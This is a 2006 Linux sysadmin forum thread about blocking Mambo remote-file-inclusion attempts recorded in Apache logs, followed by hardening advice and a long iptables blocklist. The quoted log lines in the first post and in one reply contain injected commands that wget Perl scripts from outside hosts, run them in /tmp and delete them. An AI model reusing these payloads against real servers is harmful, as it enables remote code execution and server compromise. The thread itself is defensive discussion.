topic Re: Securing Apache with Perl in Operating System - Linux

Securing Apache with Perl

Geoff Wild — Tue, 28 Mar 2006 15:26:25 GMT

How to stop hackers from trying this:

81.7.96.53 - - [27/Mar/2006:08:49:47 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gothicangel.photojerk.com/~what/cmd.txt?&cmd=cd%20/tmp;wget%20http://gothicangel.photojerk.com/~what/mambes.txt;perl%20mambes.txt;rm%20-rf%20mambes.txt ? HTTP/1.0" 200 16
216.70.72.160 - - [27/Mar/2006:10:52:10 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ns.powernet-bg.net/maps/cmd.txt?&cmd=cd%20/tmp;wget%20http://ns.powernet-bg.net/maps/but2.txt;perl%20but2.txt;rm%20-rf%20but2.txt ? HTTP/1.0" 200 16
148.222.11.6 - - [27/Mar/2006:21:50:58 -0800] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ? HTTP/1.0" 200 16

I already block an extensive list of ip's in iptables...

Rgds...Geoff

Re: Securing Apache with Perl

Ivan Ferreira — Tue, 28 Mar 2006 15:59:41 GMT

You can secure your system, but you can prevent from trying, you can configure Perl Taint Mode and apache in chroot jail. And maybe, you could use swatch.

The swatch tool monitor patterns in log files and if a patter is found, an action is executed. You can use swatch to automatically create iptables rules for these kinds of requests.

Re: Securing Apache with Perl

Geoff Wild — Tue, 28 Mar 2006 16:07:45 GMT

Is there any way to prevent someone from calling perl?

For example - what if I moved perl into a different directory - one that isn't in PATH...then modify perl scripts to have that new location?

Rgds...Geoff

Re: Securing Apache with Perl

Steven E. Protter — Tue, 28 Mar 2006 16:26:44 GMT

Shalom Geoff,

Are you sweeping the log with an automated cron script for this activity and then adding it to iptables? That could help.

This is very similar to the proxy redirect problem I encountered in the US for months.

The eventual solution was to locate the servers behind a hardware fireall solution that limited the inbound ports and protected against overloads on supposedly secure ports.

I'd like to see Ivan's procedure in more detail however.

SEP

Re: Securing Apache with Perl

Steven E. Protter — Tue, 28 Mar 2006 16:28:04 GMT

Goeff, I'm obviously missing something. Where in the log does it show perl is being called on the local machine?

SEP

Re: Securing Apache with Perl

Geoff Wild — Tue, 28 Mar 2006 16:30:48 GMT

Right here - first is does a wget, then executes perl on it, then rm's it:

http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ?

Rgds...Geoff

Re: Securing Apache with Perl

Ivan Ferreira — Tue, 28 Mar 2006 16:38:41 GMT

For more information see:

http://www.cncode.com/Download.asp?ID=1589&URL=http://downloads38.cncode.com/book/Server/HardeningApache.rar

Re: Securing Apache with Perl

Bill Thorsteinson — Tue, 28 Mar 2006 16:46:56 GMT

If you don't enable cgi mechanisms in
apache they cant call perl.
It looks like you may have php enabled.

You can restrict the directories that
cgi will run is as well.

The user apache runs as should NOT be able
to write any files or directories in the
paths available to apache. The execption
would be any files required to be written
by any CGI scripts you do enable. This
should be a limted number of directories.

If index.php does not handle any parmeters
then the references to perl are meaningless.
Remove maps/cmd.txt.

Check index.php for code similar to
cmd.txt and disable it.

Check the documetmentation at apache.org
for more details.

Re: Securing Apache with Perl

Bill Thorsteinson — Tue, 28 Mar 2006 16:49:50 GMT

You could consider restricting execution
of perl so that only root and one group
other than that of the apache server can
run it. This would prevent it from being run
by CGIs running under apache.

Re: Securing Apache with Perl

Stuart Browne — Tue, 28 Mar 2006 18:19:02 GMT

Wow, Mambo exploit! Haven't seen this one before!

What version of Mambo is it?

Re: Securing Apache with Perl

Stuart Browne — Tue, 28 Mar 2006 18:25:08 GMT

Ok, let me expand on this thought a bit.

The '/index.php' is being passed various arguments:

_REQUEST[option]=com_content
_REQUEST[itemid]=1
GLOBALS=
mosConfig_absolute_path=http://.....

As PHP's 'register_globals = on', it's expanding _REQUEST[option] to the PHP variable "$_REQUEST['option']", which is then getting interpreted by the Mambo code as if it should be there, over-writing anything that Mambo would put in there normally.

This is also what's over-writing the localized '$mosConfig_absolute_path'. I would assume that this is fopen()'d at some point, which is why this exploit comes even close to working.

So, short fix?

Try setting 'register_globals = off' in your 'php.ini'. You'll need to double check the operation of your PHP routines after this though, as any place you've relied upon this automatic translation of POST/GET variables into PHP $variables will break (should move to $_REQUEST['name'] instead).

Re: Securing Apache with Perl

Steven E. Protter — Tue, 28 Mar 2006 18:28:55 GMT

Got it.

If you shut down cgi, your web server will lose functionality. You can afford to disable wget however and that will stop this particular attack.

After that you have to harden apache against this stuff and please share, because you are not the only one undergoing this attack.

I think also your firewall might not be secure and you should post the configuration here or in another thread.

SEP

Re: Securing Apache with Perl

Geoff Wild — Wed, 29 Mar 2006 09:46:14 GMT

This exploit doesn't affect current Mambo (I'm running 4.5.3h)...

register globals is off.

To make the server safer, I will chroot apache (my dns is already...)...

As far as firewall - well...it is fairly large - but I attached as a txt file.

# wc iptables
1347 9177 52861 iptables

Also - I moved wget somewhere else...as only I need it...

perl taint mode doesn't apply - as the hackers aren't calling it that way...

All good info - points forthcoming - so be patient :)

Thanks...Geoff

Re: Securing Apache with Perl

Steven E. Protter — Wed, 29 Mar 2006 11:19:23 GMT

I would like to see what doc you use to chroot apache. I have two servers waiting for production and should obviously make this happen.

0 for this.

Shmuel

Re: Securing Apache with Perl

Geoff Wild — Wed, 29 Mar 2006 11:21:25 GMT

Currently, I'm looking at this one:

http://www.faqs.org/docs/securing/chap29sec254.html

Rgds...Geoff

Re: Securing Apache with Perl

Stuart Browne — Wed, 29 Mar 2006 15:47:29 GMT

I'm assuming you've applied the patch that's listed on the mamby page? ( http://mamboxchange.com/frs/?group_id=5 )

Re: Securing Apache with Perl

Geoff Wild — Tue, 18 Apr 2006 09:30:03 GMT

chroot - has become really complicated...

I also use mysql - so that throws another wrinkle - havn't been able to get it all together...

One day, there will be a way to accomplish what I want...

Unfortunately, I don't have a lot of time...

For now, I have moved wget outside of any PATH - and it can't be guessed easily..

Also, I added some more to my iptables:

# morons trying tool hack
# first ones are web servers with tool on them
$IPT -A INPUT -p ALL -s 38.119.100.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.106.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.78.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.39.58.0/24 -j DROP
# here are the hacker machines
$IPT -A INPUT -p ALL -s 12.178.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.209.99.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.21.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.232.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.80.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.26.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.69.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.120.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.195.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.91.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.100.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.1.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.108.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.50.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.52.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.148.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.154.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.229.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.2.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.212.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.242.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.252.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.64.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.70.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.73.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.87.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.97.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.99.179.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.119.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.14.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.207.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.27.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.38.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.39.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.62.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.71.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.76.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.81.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.111.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.12.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.174.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.175.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.75.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.111.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.132.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.134.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.152.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.180.195.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.208.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.216.159.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.221.65.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.226.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.227.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.232.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.246.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.36.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.45.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.88.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.96.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.23.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.40.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.19.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.41.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.79.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.146.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.167.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.157.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.10.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.159.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.197.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.214.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.17.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.20.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.56.201.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.60.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.61.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.37.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.66.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.67.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.153.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.187.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.81.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.93.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.94.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.60.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.86.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.21.44.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.29.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.177.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.179.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.190.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.199.13.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.201.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.203.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.231.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.145.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.24.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.63.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.65.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.68.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.69.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.74.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.76.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.81.122.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.82.18.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.84.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.174.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.91.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.170.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.182.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.183.239.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.196.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.240.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.241.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.30.206.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.90.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.92.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.93.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.94.11.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.100.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.103.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.112.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.113.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.119.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.27.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.38.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.195.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.208.35.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.220.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.221.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.70.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.76.51.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.77.71.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.102.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.133.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.137.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.149.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.16.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.170.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.237.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.18.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.217.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.227.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.223.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.238.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.64.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.65.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.163.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.191.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.233.156.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.24.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.243.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.131.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.245.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.40.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.45.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.98.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.10.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.111.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.14.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.142.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.159.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.190.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.197.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.25.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.34.189.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.39.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.109.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.34.150.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.39.130.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.43.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.55.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 87.233.14.0/24 -j DROP
$IPT -A INPUT -p ALL -s 88.80.193.0/24 -j DROP
$IPT -A INPUT -p ALL -s 129.241.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.226.80.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.89.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 131.203.76.0/24 -j DROP
$IPT -A INPUT -p ALL -s 137.224.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.44.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.62.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 143.234.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 147.202.66.0/24 -j DROP
$IPT -A INPUT -p ALL -s 148.216.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 155.185.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 156.63.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 157.118.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.42.184.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.75.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.139.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.246.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.53.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 166.114.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 171.64.116.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.109.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.110.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.189.141.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.192.247.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.203.240.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.206.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.226.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.255.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.43.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.106.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.126.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.150.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.29.142.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.42.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.63.250.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.95.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.137.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.165.93.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.171.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.177.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.199.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.251.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.123.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.35.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.42.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.48.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.54.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.56.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.95.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 196.200.57.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.173.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.54.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.66.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.69.255.0/24 -j DROP
$IPT -A INPUT -p ALL -s 199.227.113.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.110.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.123.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.17.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.179.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.21.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.250.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.252.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.27.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.28.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.29.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.30.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.45.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.50.15.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.66.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.74.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.79.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.85.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.197.0/24 -j DROP
